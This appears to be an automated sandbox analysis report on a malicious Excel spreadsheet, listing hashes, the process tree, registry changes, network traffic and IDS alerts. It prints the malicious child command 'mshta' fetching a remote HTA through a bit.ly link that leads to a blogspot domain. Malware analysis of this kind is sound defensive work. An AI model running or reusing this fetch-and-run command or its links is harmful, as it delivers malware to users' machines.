File name: | c4e5625408ddb6025dc306198da682bd62bdfeaef0e840844161174e99b111e1 |
Full analysis: | https://app.any.run/tasks/a88fb47b-1307-45e1-947b-629a19d9c78e |
Verdict: | Malicious activity |
Analysis date: | September 11, 2019, 05:29:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sat Aug 17 23:29:34 2019, Security: 0 |
MD5: | 0FC7822AA33281BE70CDA15111878ACA |
SHA1: | 5B27980AE91CCCDFCDF3230E523FDD99AC99C675 |
SHA256: | C4E5625408DDB6025DC306198DA682BD62BDFEAEF0E840844161174E99B111E1 |
SSDEEP: | 1536:+qZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAbdIxtckcfyKH+xDH8mCUOvt2BZi6j:+qZ+RwPONXoRjDhIcp0fDlaGGx+cL26u |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Office Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 38 |
HeadingPairs: |
|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 12 |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:08:17 22:29:34 |
CreateDate: | 2006:09:16 00:00:00 |
Software: | Microsoft Excel |
LastModifiedBy: | - |
Author: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2896 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3272 | mshta http://www.bitly.com/aswoesx7jxwxxd | C:\Windows\system32\mshta.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2896) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | write | Name: | g6" |
Value: 67362200500B0000010000000000000000000000 | |||
(PID) Process: | (2896) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2896) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2896) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel |
Operation: | write | Name: | MTTT |
Value: 500B000078F3A8EA6168D50100000000 | |||
(PID) Process: | (2896) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | delete value | Name: | g6" |
Value: 67362200500B0000010000000000000000000000 | |||
(PID) Process: | (2896) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | delete key | Name: | |
Value: | |||
(PID) Process: | (2896) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency |
Operation: | delete key | Name: | |
Value: | |||
(PID) Process: | (2896) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (2896) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (2896) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\16CA5A |
Operation: | write | Name: | 16CA5A |
Value: 04000000500B00006600000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0063003400650035003600320035003400300038006400640062003600300032003500640063003300300036003100390038006400610036003800320062006400360032006200640066006500610065006600300065003800340030003800340034003100360031003100370034006500390039006200310031003100650031002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000A01F5DEC6168D5015ACA16005ACA160000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2896 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRC2E7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3272 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\css[1].txt | — | |
MD5:— | SHA256:— | |||
3272 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@blogspot[1].txt | — | |
MD5:— | SHA256:— | |||
3272 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\css[1].txt | text | |
MD5:C0EF21B006A1828712B51C642771E12D | SHA256:9F16BD8D07E631F3D27406B0B78174915437A3FC16E759B67E1E021774185E7B | |||
3272 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@blogspot[2].txt | text | |
MD5:E5A226EC4F8D1FEBBF5AF2EE7E5CB643 | SHA256:AA7AFF15B2363EBB88DC3F491D74F1B5FEBCB57B9C48694AFA7E09CE1CD5BA04 | |||
3272 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\css[1].txt | text | |
MD5:6EEC65A135D21908D028750C5C76D482 | SHA256:B76851291F74BECEF1BC707D6E26F516BFE36F8BB498D9EB0E4AF3FF7F03AFDA | |||
3272 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\analytics[1].js | text | |
MD5:B66B3B5D54E154C81A50880CDCD7E5F8 | SHA256:DBB67C620EAABF6679A314DB18D3AE43037AEF71AB27422E6FEEC08EE987CC0A | |||
3272 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\error[1] | text | |
MD5:35FE91C2AC1BA0913CC617622B9EB43F | SHA256:966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837 | |||
3272 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txt | text | |
MD5:E32A38AD3331FE62C899F52910416D76 | SHA256:C86751DA1D178C6B91B2854D9858BDA74D359676D79D486428BCBBDDE582C045 | |||
3272 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN[1].eot | eot | |
MD5:A88E37BFDDCACBD2CB912F40658A5DB3 | SHA256:A1C4E7917D65304CD45AB802C260612F45687ACE47BA930A1F94F016534277FC |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3272 | mshta.exe | GET | 301 | 67.199.248.14:80 | http://bitly.com/aswoesx7jxwxxd | US | html | 133 b | shared |
3272 | mshta.exe | GET | 301 | 67.199.248.14:80 | http://www.bitly.com/aswoesx7jxwxxd | US | html | 178 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3272 | mshta.exe | 172.217.21.193:443 | sxasxasxsasxasx.blogspot.com | Google Inc. | US | whitelisted |
3272 | mshta.exe | 216.58.205.228:443 | www.google.com | Google Inc. | US | whitelisted |
3272 | mshta.exe | 216.58.207.42:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
3272 | mshta.exe | 67.199.248.14:80 | www.bitly.com | Bitly Inc | US | shared |
3272 | mshta.exe | 172.217.22.9:443 | www.blogger.com | Google Inc. | US | whitelisted |
3272 | mshta.exe | 216.58.207.78:443 | www.google-analytics.com | Google Inc. | US | whitelisted |
3272 | mshta.exe | 216.58.206.3:443 | fonts.gstatic.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.bitly.com |
| shared |
sxasxasxsasxasx.blogspot.com |
| whitelisted |
fonts.googleapis.com |
| whitelisted |
www.google.com |
| whitelisted |
www.blogger.com |
| shared |
fonts.gstatic.com |
| whitelisted |
www.google-analytics.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3272 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3272 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |